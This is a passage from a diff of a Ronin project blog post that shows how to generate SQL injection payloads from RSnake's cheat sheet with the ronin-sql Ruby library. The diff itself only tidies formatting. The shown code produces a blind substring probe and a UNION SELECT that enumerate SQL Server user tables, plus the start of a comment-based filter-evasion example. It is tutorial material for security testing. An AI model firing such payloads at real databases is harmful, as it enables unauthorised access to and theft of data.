ronin-rb/ronin-rb.github.io/blog/_posts/2010-02-05-rsnakes-sqli-cheat-sheet-using-ronin-sql.md

 # => "1 and ascii(lower(substring((select top 1 name from sysobjects where xtype = 'U'),1,1))) > 116"
 {% endhighlight %}

-Finding user supplied tables using the sysObjects table in SQL Server:
+Finding user supplied tables using the `sysObjects` table in SQL Server:

 {% highlight ruby %}
 sql[1, :union, :all, :select, [1,2,3,4,5,6,:name], :from, :sysObjects, :where, :xtype, :eq, 'U'].to_sql
 # => "1 union * select (1,2,3,4,5,6,name) from sysObjects where xtype = 'U'"
 {% endhighlight %}

-Bypassing filter evasion using comment tags:
+Bypassing filter using `/**/` instead of spaces:

 {% highlight ruby %}
 stmt = sql[1, :union, :select, :all, :from, :where]